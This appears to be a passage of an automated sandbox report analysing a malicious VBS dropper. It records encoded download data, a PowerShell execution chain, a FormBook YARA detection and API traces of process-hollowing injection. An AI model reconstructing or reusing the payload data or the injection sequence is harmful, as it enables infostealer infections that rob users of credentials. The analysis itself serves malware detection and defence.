                                                      Data Ascii: wByAEEANABNAEkATgBuAFYAQwB5AGsAYQBZAFYASwBHAFkAVABBAFUAegAvAEcAWQB6AEMAUgBYAFcALwBzAG4AaABrAFoAWABrAGIAZgB2AG0AdwAwAE4AcwB3AGUAYwBmADUAZwBmADQAbgA0AG8AeAA3AEwAdgAyADgAVQBlAGsAZABoAEUARwBMAFYAYwB2AHQAZABsAEkAbgBnAFQAcQBLAHAATgBvADUANgA0AFgAWQA1AHcAZQB5AGEA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 67 42 32 41 48 59 41 59 67 42 73 41 48 6b 41 52 77 42 52 41 43 38 41 62 77 42 45 41 44 67 41 61 77 42 50 41 45 51 41 5a 77 42 73 41 48 4d 41 52 51 41 7a 41 44 45 41 4f 41 42 4a 41 45 38 41 51 77 42 72 41 43 38 41 52 77 42 53 41 44 4d 41 63 41 42 4b 41 48 67 41 4e 41 42 4e 41 45 6b 41 5a 41 42 78 41 44 51 41 64 77 42 43 41 46 45 41 64 77 41 76 41 44 59 41 4c 77 42 59 41 46 6b 41 4e 51 42 54 41 47 73 41 59 67 41 7a 41 47 6f 41 4d 67 42 32 41 45 67 41 4f 51 42 42 41 44 4d 41 54 41 42 31 41 48 49 41 59 77 42 36 41 46 55 41 4e 77 42 59 41 47 6f 41 57 51 42 75 41 47 4d 41 59 67 41 30 41 44 67 41 62 51 42 74 41 48 41 41 4d 67 42 58 41 46 67 41 5a 77 42 68 41 43 73 41 53 41 42 7a 41 46 63 41 65 67 42 73 41 46 45 41 57 41 42 54 41 45 59 41 63 51 42 5a 41 44 41 41
                                                      Data Ascii: gB2AHYAYgBsAHkARwBRAC8AbwBEADgAawBPAEQAZwBsAHMARQAzADEAOABJAE8AQwBrAC8ARwBSADMAcABKAHgANABNAEkAZABxADQAdwBCAFEAdwAvADYALwBYAFkANQBTAGsAYgAzAGoAMgB2AEgAOQBBADMATAB1AHIAYwB6AFUANwBYAGoAWQBuAGMAYgA0ADgAbQBtAHAAMgBXAFgAZwBhACsASABzAFcAegBsAFEAWABTAEYAcQBZADAA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 67 42 6b 41 45 34 41 61 51 42 45 41 47 55 41 4c 77 42 52 41 44 49 41 53 51 42 31 41 45 45 41 4e 67 42 32 41 44 55 41 59 77 42 30 41 46 6b 41 53 67 42 52 41 45 59 41 57 41 42 76 41 48 6b 41 59 67 42 36 41 44 63 41 53 77 42 78 41 45 4d 41 54 41 42 6b 41 45 63 41 4b 77 42 32 41 45 30 41 53 77 41 31 41 48 51 41 53 77 41 31 41 48 6f 41 64 51 42 76 41 48 59 41 65 51 42 61 41 47 38 41 55 41 42 31 41 47 34 41 57 67 42 4c 41 47 30 41 59 67 42 79 41 44 51 41 4f 51 42 71 41 48 6b 41 59 51 42 58 41 44 41 41 61 41 42 57 41 45 51 41 51 51 42 57 41 47 55 41 56 77 42 4b 41 43 73 41 54 41 42 33 41 45 51 41 5a 77 42 49 41 47 6f 41 57 51 42 52 41 48 45 41 52 51 41 76 41 48 4d 41 56 41 42 56 41 46 63 41 54 41 42 78 41 47 30 41 4e 77 42 70 41 47 63 41 65 41 42 54 41 45 4d 41
                                                      Data Ascii: gBkAE4AaQBEAGUALwBRADIASQB1AEEANgB2ADUAYwB0AFkASgBRAEYAWABvAHkAYgB6ADcASwBxAEMATABkAEcAKwB2AE0ASwA1AHQASwA1AHoAdQBvAHYAeQBaAG8AUAB1AG4AWgBLAG0AYgByADQAOQBqAHkAYQBXADAAaABWAEQAQQBWAGUAVwBKACsATAB3AEQAZwBIAGoAWQBRAHEARQAvAHMAVABVAFcATABxAG0ANwBpAGcAeABTAEMA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 41 42 31 41 46 6b 41 65 41 42 31 41 48 4d 41 51 67 42 77 41 46 4d 41 64 67 42 6c 41 48 45 41 56 77 42 71 41 47 6b 41 57 41 42 53 41 45 34 41 52 51 42 6b 41 45 77 41 4d 51 42 6e 41 43 38 41 5a 67 42 6c 41 48 41 41 54 41 42 32 41 48 55 41 61 77 41 31 41 43 73 41 4e 67 42 68 41 48 49 41 63 51 42 72 41 47 45 41 64 77 42 54 41 44 45 41 51 67 42 78 41 47 4d 41 52 77 42 44 41 47 30 41 51 51 42 31 41 47 38 41 61 77 42 77 41 48 41 41 4d 41 42 6d 41 45 73 41 61 51 42 46 41 47 6f 41 54 77 42 46 41 45 6b 41 61 51 42 31 41 45 51 41 65 41 42 47 41 45 34 41 56 77 42 50 41 44 6b 41 57 51 42 4e 41 46 49 41 4d 67 42 46 41 47 34 41 61 51 42 46 41 48 6b 41 4d 67 42 74 41 45 34 41 63 77 41 76 41 46 63 41 4c 77 42 77 41 47 55 41 55 51 42 59 41 44 59 41 64 77 42 6b 41 46 6f 41
                                                      Data Ascii: AB1AFkAeAB1AHMAQgBwAFMAdgBlAHEAVwBqAGkAWABSAE4ARQBkAEwAMQBnAC8AZgBlAHAATAB2AHUAawA1ACsANgBhAHIAcQBrAGEAdwBTADEAQgBxAGMARwBDAG0AQQB1AG8AawBwAHAAMABmAEsAaQBFAGoATwBFAEkAaQB1AEQAeABGAE4AVwBPADkAWQBNAFIAMgBFAG4AaQBFAHkAMgBtAE4AcwAvAFcALwBwAGUAUQBYADYAdwBkAFoA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 41 41 30 41 45 6f 41 64 67 42 75 41 46 59 41 62 77 42 59 41 46 59 41 52 67 42 4e 41 47 51 41 62 67 42 57 41 46 6b 41 51 67 42 30 41 45 67 41 62 51 42 43 41 46 59 41 52 77 42 74 41 45 38 41 56 51 41 34 41 47 4d 41 52 77 42 31 41 47 67 41 4f 41 42 78 41 46 67 41 4d 67 42 72 41 46 63 41 54 41 42 73 41 48 51 41 61 77 42 74 41 46 67 41 51 77 42 75 41 46 4d 41 54 41 41 34 41 45 45 41 4b 77 42 79 41 44 45 41 51 67 41 30 41 47 34 41 62 51 42 75 41 48 49 41 57 41 42 54 41 44 4d 41 56 67 41 33 41 48 51 41 56 41 42 4f 41 48 41 41 54 67 42 46 41 46 63 41 52 51 42 4a 41 48 6b 41 52 51 42 48 41 46 41 41 61 77 42 70 41 47 34 41 54 77 42 57 41 46 55 41 4d 77 42 79 41 45 73 41 56 77 42 32 41 44 49 41 53 41 42 6e 41 47 34 41 56 67 42 72 41 48 6b 41 4d 67 42 32 41 47 38 41
                                                      Data Ascii: AA0AEoAdgBuAFYAbwBYAFYARgBNAGQAbgBWAFkAQgB0AEgAbQBCAFYARwBtAE8AVQA4AGMARwB1AGgAOABxAFgAMgBrAFcATABsAHQAawBtAFgAQwBuAFMATAA4AEEAKwByADEAQgA0AG4AbQBuAHIAWABTADMAVgA3AHQAVABOAHAATgBFAFcARQBJAHkARQBHAFAAawBpAG4ATwBWAFUAMwByAEsAVwB2ADIASABnAG4AVgBrAHkAMgB2AG8A


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:07:37:37
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs"
                                                      Imagebase:0x7ff607ec0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:07:37:43
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                      Imagebase:0x7ff741d30000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:07:37:43
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:07:37:47
                                                      Start date:18/12/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\x.exe"
                                                      Imagebase:0x460000
                                                      File size:776'704 bytes
                                                      MD5 hash:68FC317E2CC6A7B69F76B9D8DDEC0C79
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:07:37:47
                                                      Start date:18/12/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x8f0000
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FFAAB510000 Relevance: 3.9, Strings: 2, Instructions: 1382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447765577.00007FFAAB510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB510000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab510000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r63$r63
                                                        • API String ID: 0-2640113253
                                                        • Opcode ID: 122c21025db296c62edffe711f4d0c26e1b7ada59a8d2be4f5dbae0d538ec666
                                                        • Instruction ID: 20355bdb22edcc9c44ab29ed2ec2071a7208cef45dc2986c6cd3fc5c5112288d
                                                        • Opcode Fuzzy Hash: 122c21025db296c62edffe711f4d0c26e1b7ada59a8d2be4f5dbae0d538ec666
                                                        • Instruction Fuzzy Hash: AD924762A4EBC68FE796A728A8255747FE5EF57250B0C40FBD04ECB0B3D9189C09C391
                                                        Function 00007FFAAB5107F7 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447765577.00007FFAAB510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB510000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab510000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r63$r63
                                                        • API String ID: 0-2640113253
                                                        • Opcode ID: 39b7ccbebfb3194a0f67aab362961a159e8130aa133f20eb23bd83f0de2494ff
                                                        • Instruction ID: bde7098d205932e2dda24b176843e3faca2b0bf7861c514483f40f34ba70ff2b
                                                        • Opcode Fuzzy Hash: 39b7ccbebfb3194a0f67aab362961a159e8130aa133f20eb23bd83f0de2494ff
                                                        • Instruction Fuzzy Hash: 4311EB22E5E907DBF6E8B70874561B922C5EF96390F5C8179E80FC21F7DE08AC0545C1
                                                        Function 00007FFAAB4437B5 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447347176.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab440000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction ID: 5b19ad272d9732cf16a905d4989d8dfae199ea890a714681719d8e606c14bd51
                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction Fuzzy Hash: 8D01A77111CB0C8FD744EF0CE051AA6B7E0FB85364F10056DE58AC3661DA32E882CB41

                                                        Non-executed Functions

                                                        Function 00007FFAAB44044D Relevance: 7.6, Strings: 6, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1447347176.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffaab440000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (0P$8,P$P/P$p0P$-P$/P
                                                        • API String ID: 0-2909572849
                                                        • Opcode ID: c8a6d61b67c8fbea86baf81c2592e85161dd96e47b1a28f7a7701a1b6cee3fa0
                                                        • Instruction ID: a91d09deceed1ff0fd854110e4ca47f39f1622b7c0d4d7fa55e5f7c99c77704e
                                                        • Opcode Fuzzy Hash: c8a6d61b67c8fbea86baf81c2592e85161dd96e47b1a28f7a7701a1b6cee3fa0
                                                        • Instruction Fuzzy Hash: CF31844390F7D14FE3168BA85C250A86FA4EF93290B1984FBD0CDDA6EB98149D2D83D1

                                                        Execution Graph

                                                        Execution Coverage:43%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:79
                                                        Total number of Limit Nodes:4
                                                        execution_graph 682 2790848 683 279085d 682->683 686 27908a1 683->686 687 27908fd 686->687 691 2790939 687->691 695 2790948 687->695 692 2790971 691->692 699 27909c0 692->699 693 279098b 693->693 696 2790971 695->696 698 27909c0 5 API calls 696->698 697 279098b 697->697 698->697 700 27909fa 699->700 701 2790a28 700->701 704 2790c70 700->704 715 2790c80 700->715 701->693 705 2790ca4 704->705 707 2790d39 705->707 710 2790d70 705->710 726 2791322 705->726 731 27905b4 705->731 735 2791548 707->735 708 2790d4e 740 2791670 708->740 709 2790d5c 745 27918b0 709->745 710->701 716 2790ca4 715->716 717 27905b4 ReadProcessMemory 716->717 718 2790d39 716->718 721 2790d70 716->721 723 2791322 Wow64SetThreadContext 716->723 717->716 724 2791548 VirtualAllocEx 718->724 719 2790d4e 722 2791670 WriteProcessMemory 719->722 720 2790d5c 725 27918b0 ResumeThread 720->725 721->701 722->720 723->716 724->719 725->721 730 2791343 726->730 727 2791422 Wow64SetThreadContext 729 2791446 727->729 728 279137a 728->705 729->705 730->727 730->728 732 2791488 ReadProcessMemory 731->732 734 2791516 732->734 734->705 737 279156f 735->737 736 2791584 736->708 737->736 738 279160b VirtualAllocEx 737->738 739 2791642 738->739 739->708 742 279169c 740->742 741 2791756 741->709 742->741 743 2791841 WriteProcessMemory 742->743 744 279187c 743->744 744->709 746 27918db 745->746 747 2791a39 ResumeThread 746->747 748 2791957 746->748 749 2791a66 747->749 748->710 749->710 762 27919f8 763 2791a39 ResumeThread 762->763 764 2791a66 763->764 769 27915c8 770 279160b VirtualAllocEx 769->770 771 2791642 770->771 750 2790f60 752 2790fe9 CreateProcessA 750->752 753 27911fe 752->753 758 2790620 759 2790625 758->759 761 27908a1 5 API calls 759->761 760 279087b 761->760 765 27917e0 766 279182b WriteProcessMemory 765->766 768 279187c 766->768 772 27913c0 773 2791408 Wow64SetThreadContext 772->773 775 2791446 773->775 776 2791480 777 27914d3 ReadProcessMemory 776->777 778 2791516 777->778 754 2790f54 756 2790f60 CreateProcessA 754->756 757 27911fe 756->757

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_02790678 1 Function_02790278 2 Function_02790A78 33 Function_0279014C 2->33 41 Function_0279013C 2->41 46 Function_0279012C 2->46 3 Function_02790E71 4 Function_02790C70 6 Function_02791670 4->6 32 Function_02791548 4->32 50 Function_02791322 4->50 58 Function_02790F0A 4->58 86 Function_027905CC 4->86 91 Function_027905C0 4->91 98 Function_027918B0 4->98 101 Function_027905B4 4->101 5 Function_02790070 23 Function_02790654 6->23 7 Function_02790174 8 Function_02790474 9 Function_02791274 110 Function_0279029C 9->110 10 Function_02790168 11 Function_02790468 12 Function_0279056B 13 Function_0279126B 14 Function_02790A6A 14->33 14->41 14->46 15 Function_0279026C 16 Function_02790F60 16->110 17 Function_02790060 18 Function_02790260 19 Function_02790C58 20 Function_0279015C 21 Function_0279045C 22 Function_02790450 24 Function_02790F54 24->110 25 Function_02790254 26 Function_02790054 27 Function_02790557 28 Function_02790C49 29 Function_02790248 30 Function_02790848 105 Function_027908A1 30->105 31 Function_02790948 89 Function_027909C0 31->89 34 Function_02790541 35 Function_02790444 36 Function_02790539 37 Function_02790939 37->89 38 Function_02790C39 39 Function_02790238 40 Function_0279053D 42 Function_02790535 43 Function_02790434 44 Function_02790C2B 45 Function_02790A2A 47 Function_0279022C 48 Function_02790220 49 Function_02790620 49->105 55 Function_02790610 50->55 51 Function_02790519 52 Function_0279051D 53 Function_0279011C 54 Function_02790511 56 Function_02790515 57 Function_02790509 59 Function_0279020D 60 Function_0279050D 61 Function_0279010C 62 Function_02790501 63 Function_02790100 64 Function_02790505 65 Function_02790007 66 Function_027904F9 67 Function_027919F8 68 Function_027901F8 69 Function_027905F8 70 Function_027904FD 71 Function_02790BFD 72 Function_027904F1 73 Function_027900F0 74 Function_027904F5 75 Function_027901EC 76 Function_027917E0 77 Function_027900E4 78 Function_027904D9 79 Function_027904D1 80 Function_027904D5 81 Function_027900D4 82 Function_027904C9 83 Function_027915C8 84 Function_027900C8 85 Function_027904CD 87 Function_02790BCF 88 Function_027904C1 89->2 89->4 89->14 116 Function_02790C80 89->116 90 Function_027913C0 92 Function_027901C5 93 Function_027904C5 94 Function_027904B9 95 Function_027904BD 96 Function_027900BC 97 Function_027904B1 98->0 98->23 99 Function_027900B0 100 Function_027904B5 102 Function_027901B4 103 Function_027901A8 104 Function_027909AB 105->31 105->37 106 Function_02790BA1 107 Function_027900A0 108 Function_027904A4 109 Function_02790498 111 Function_0279019C 112 Function_02790090 113 Function_02790290 114 Function_0279018C 115 Function_0279048C 116->6 116->32 116->50 116->58 116->86 116->91 116->98 116->101 117 Function_02790180 118 Function_02790080 119 Function_02790480 120 Function_02791480 121 Function_02790685 121->105 122 Function_02790284

                                                        Executed Functions

                                                        Function 02790F54 Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 2790f54-2790ff5 3 2791049-2791069 0->3 4 2790ff7-279101c 0->4 7 279106b-2791090 3->7 8 27910bd-27910ee 3->8 4->3 9 279101e-2791020 4->9 7->8 19 2791092-2791094 7->19 17 27910f0-2791118 8->17 18 2791145-27911fc CreateProcessA 8->18 10 2791043-2791046 9->10 11 2791022-279102c 9->11 10->3 14 279102e 11->14 15 2791030-279103f 11->15 14->15 15->15 16 2791041 15->16 16->10 17->18 26 279111a-279111c 17->26 31 27911fe-2791204 18->31 32 2791205-2791280 18->32 20 27910b7-27910ba 19->20 21 2791096-27910a0 19->21 20->8 23 27910a2 21->23 24 27910a4-27910b3 21->24 23->24 24->24 27 27910b5 24->27 28 279113f-2791142 26->28 29 279111e-2791128 26->29 27->20 28->18 33 279112a 29->33 34 279112c-279113b 29->34 31->32 44 2791290-2791294 32->44 45 2791282-2791286 32->45 33->34 34->34 35 279113d 34->35 35->28 46 27912a4-27912a8 44->46 47 2791296-279129a 44->47 45->44 48 2791288-279128b call 279029c 45->48 51 27912b8-27912bc 46->51 52 27912aa-27912ae 46->52 47->46 50 279129c-279129f call 279029c 47->50 48->44 50->46 55 27912ce-27912d5 51->55 56 27912be-27912c4 51->56 52->51 54 27912b0-27912b3 call 279029c 52->54 54->51 58 27912ec 55->58 59 27912d7-27912e6 55->59 56->55 60 27912ed 58->60 59->58 60->60
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 027911E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 5d4b3f46f723baa4bf87106cad74803ed1bf236917f2fb208a96630998336eb5
                                                        • Instruction ID: 2f3b03c9498ba556fe8d5e9a0d2325c1dec50975cd0e7e9876331b54ab4a80b9
                                                        • Opcode Fuzzy Hash: 5d4b3f46f723baa4bf87106cad74803ed1bf236917f2fb208a96630998336eb5
                                                        • Instruction Fuzzy Hash: D3A16C71E0035A9FEF20DFA8D8417EEBBF2AB48314F148169E818E7280D7759995CF91
                                                        Function 02790F60 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 62 2790f60-2790ff5 64 2791049-2791069 62->64 65 2790ff7-279101c 62->65 68 279106b-2791090 64->68 69 27910bd-27910ee 64->69 65->64 70 279101e-2791020 65->70 68->69 80 2791092-2791094 68->80 78 27910f0-2791118 69->78 79 2791145-27911fc CreateProcessA 69->79 71 2791043-2791046 70->71 72 2791022-279102c 70->72 71->64 75 279102e 72->75 76 2791030-279103f 72->76 75->76 76->76 77 2791041 76->77 77->71 78->79 87 279111a-279111c 78->87 92 27911fe-2791204 79->92 93 2791205-2791280 79->93 81 27910b7-27910ba 80->81 82 2791096-27910a0 80->82 81->69 84 27910a2 82->84 85 27910a4-27910b3 82->85 84->85 85->85 88 27910b5 85->88 89 279113f-2791142 87->89 90 279111e-2791128 87->90 88->81 89->79 94 279112a 90->94 95 279112c-279113b 90->95 92->93 105 2791290-2791294 93->105 106 2791282-2791286 93->106 94->95 95->95 96 279113d 95->96 96->89 107 27912a4-27912a8 105->107 108 2791296-279129a 105->108 106->105 109 2791288-279128b call 279029c 106->109 112 27912b8-27912bc 107->112 113 27912aa-27912ae 107->113 108->107 111 279129c-279129f call 279029c 108->111 109->105 111->107 116 27912ce-27912d5 112->116 117 27912be-27912c4 112->117 113->112 115 27912b0-27912b3 call 279029c 113->115 115->112 119 27912ec 116->119 120 27912d7-27912e6 116->120 117->116 121 27912ed 119->121 120->119 121->121
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 027911E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: eb37d438e7ddd1fbdcb986f03ede3b87978a86039684c41d24e0541ae278036f
                                                        • Instruction ID: 2b1813a4a9f6cbf60d83948901ffd7c0438d44334d03aee87dc7640931a92b36
                                                        • Opcode Fuzzy Hash: eb37d438e7ddd1fbdcb986f03ede3b87978a86039684c41d24e0541ae278036f
                                                        • Instruction Fuzzy Hash: 86A16C71E0035A9FEF20DFA8D8417EEBBF2AB48304F108169E818E7280D7759995CF91
                                                        Function 02791670 Relevance: 1.7, APIs: 1, Instructions: 192injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 123 2791670-27916bc call 2790654 127 2791760-2791784 123->127 128 27916c2-27916de 123->128 137 279178b-2791831 127->137 131 27916e0-2791708 128->131 132 2791756-279175d 128->132 139 2791748-2791754 131->139 140 279170a-279173f call 2790654 131->140 151 2791841-279187a WriteProcessMemory 137->151 152 2791833-279183f 137->152 139->131 139->132 147 2791744-2791746 140->147 147->137 147->139 153 279187c-2791882 151->153 154 2791883-27918ab 151->154 152->151 153->154
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0279186D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: ac77d3cc1943a6c170095da307c0c6f371566a392bf3098bdfc294276ba0bca8
                                                        • Instruction ID: 7b51d9fa1ae4b570ec0798e6ebc99294ad400b59a05fe9590d809d6d16aa084c
                                                        • Opcode Fuzzy Hash: ac77d3cc1943a6c170095da307c0c6f371566a392bf3098bdfc294276ba0bca8
                                                        • Instruction Fuzzy Hash: 8061C371A0031A9FCB15CFA8D891AEFBBF2FF88310F548569D8099B345DB349905CBA4
                                                        Function 027918B0 Relevance: 1.7, APIs: 1, Instructions: 151threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 157 27918b0-27918fa call 2790654 161 27918fc-2791910 157->161 162 279195e-2791982 157->162 165 27919df-2791a64 ResumeThread 161->165 166 2791916-279192e call 279066c 161->166 177 2791989-27919ad 162->177 183 2791a6d-2791a8a 165->183 184 2791a66-2791a6c 165->184 171 2791930-2791942 call 2790678 166->171 172 2791944-279194d call 2790684 166->172 171->172 171->177 180 2791952-2791955 172->180 181 27919b4-27919d8 177->181 180->181 182 2791957-279195b 180->182 181->165 184->183
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 7a82313c4c1602debcb006efbdad195c58c1f6d97297c8c51d6db45dda53f30d
                                                        • Instruction ID: 752ae8d12ef044e6fbbda876275fb33ef3506d78faa96be92cb287af8398d7ea
                                                        • Opcode Fuzzy Hash: 7a82313c4c1602debcb006efbdad195c58c1f6d97297c8c51d6db45dda53f30d
                                                        • Instruction Fuzzy Hash: 4151B371A003098FDB25DBA9E454BAEBBF2EFC4210F148459D519DB395DB349C02CBA9
                                                        Function 02791322 Relevance: 1.6, APIs: 1, Instructions: 114threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 193 2791322-2791349 195 279134b-279135d call 2790604 193->195 196 27913aa-27913bc 193->196 199 2791362-2791364 195->199 200 27913be-279140c 196->200 201 2791422-2791444 Wow64SetThreadContext 196->201 202 279137a-279137e 199->202 203 2791366-2791378 call 2790610 199->203 210 2791418-2791421 200->210 211 279140e-2791416 200->211 205 279144d-2791475 201->205 206 2791446-279144c 201->206 203->202 212 279137f-27913a3 203->212 206->205 210->201 211->210 212->196
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02791437
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: e02b093d7ff527240cb3b529e9ed3fc41f1fcc49d379e3e475e33319870da873
                                                        • Instruction ID: b0f4fba019cf9c1e332b31345539e926673497c2405ec2da8aa960179d8a1b5e
                                                        • Opcode Fuzzy Hash: e02b093d7ff527240cb3b529e9ed3fc41f1fcc49d379e3e475e33319870da873
                                                        • Instruction Fuzzy Hash: AE41DF31A0035A8FCB11DBA9D4557AEBBF1FF49220F1580AAC848EB351D7389846CBA1
                                                        Function 02791548 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
